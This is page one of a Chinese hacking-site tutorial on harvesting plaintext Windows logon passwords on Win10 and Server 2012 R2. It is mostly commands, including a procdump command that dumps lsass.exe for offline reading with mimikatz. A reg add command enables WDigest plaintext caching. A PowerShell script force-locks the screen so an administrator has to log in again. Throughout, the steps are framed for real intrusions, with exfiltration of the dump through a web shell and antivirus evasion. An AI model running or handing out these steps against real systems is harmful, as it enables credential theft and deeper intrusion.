欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

Win10及2012系统以后的明文抓取方式

来源:本站整理 作者:佚名 时间:2019-03-29 TAG: 我要投稿

1. procdump+mimikatz获取win10/win2012 R2用户明文密码
测试环境:win10企业版和win2012 R2 版本
工具下载:链接:https://pan.baidu.com/s/1gNc9qLcNSNBohIVrAiqShw 密码:fc38
原理:获取到内存文件lsass.exe进程(它用于本地安全和登陆策略)中存储的明文登录密码
利用前提:拿到了admin权限的cmd,管理员用密码登录机器,并运行了lsass.exe进程,把密码保存在内存文件lsass进程中。
抓取明文:手工修改注册表 + 强制锁屏 + 等待目标系统管理员重新登录 = 截取明文密码

根据相应系统位数,选择工具

运行cmd , cd 进入相应软件目录。

先用procdump64.exe导出lsass.dmp
procdump64.exe -accepteula -ma lsass.exe lsass.dmp


命令执行完成之后,会有提示下载路径。
然后把 lsass.dmp 下载到本地(实战中可以从菜刀下载或者网站访问下载等等)
使用本地的mimikatz.exe读取lsass.dmp。
相应目录快捷打开cmd(此时读取过程不需要管理员权限的cmd)

在默认情况下,当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,如下图,密码字段显示为null,此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。
如下图是没有修改注册表时的读取结果,无明文。

但是我们可以通过修改注册表来让Wdigest Auth保存明文口令:
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

如需恢复原样,只需将上图REG_DWORD的值1改为0即可。
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 0 /f

修改注册表之后,修改了之后需要用户注销或者重新登陆之后才会生效。
使用强制锁屏ps1脚本(只适用于win服务器版本,win10测试不通过)
把如下代码保存为lock-screen.ps1。
Function Lock-WorkStation {
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
$LockWorkStation::LockWorkStation() | Out-Null
}
Lock-WorkStation
执行: powershell -file lock-screen.ps1

管理员重新登录。

如下图,重启后,重新操作以上步骤,成功读取明文。


总结:
在系统为win10或2012R2以上时,都需要配置注册表并重新登录后才能抓取明文。
优点和缺点:
优点:用procdump导出lsass.dmp后拖回本地抓取密码来规避杀软。
缺点:修改注册表之后,需要重新登录才能生效,可以使用锁屏脚本(锁屏之前,一定要查看管理员是否在线),让管理员重新登录。
 
2. Mimikatz
mimikatz是一款轻量级的调试神器,功能非常强大,其中最常用的功能就是抓取明文或Hash。
原理:Lsass.exe中恢复明文密码。
前提:拿到了目标的管理员权限,并运行了lsass.exe进程,把密码保存在内存文件lsass进程中。
Mimikatz.exe版本工具下载(下载相应版本):https://github.com/gentilkiwi/mimikatz/releases
测试环境:win10企业版和win2012 R2 版本

[1] [2] [3]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载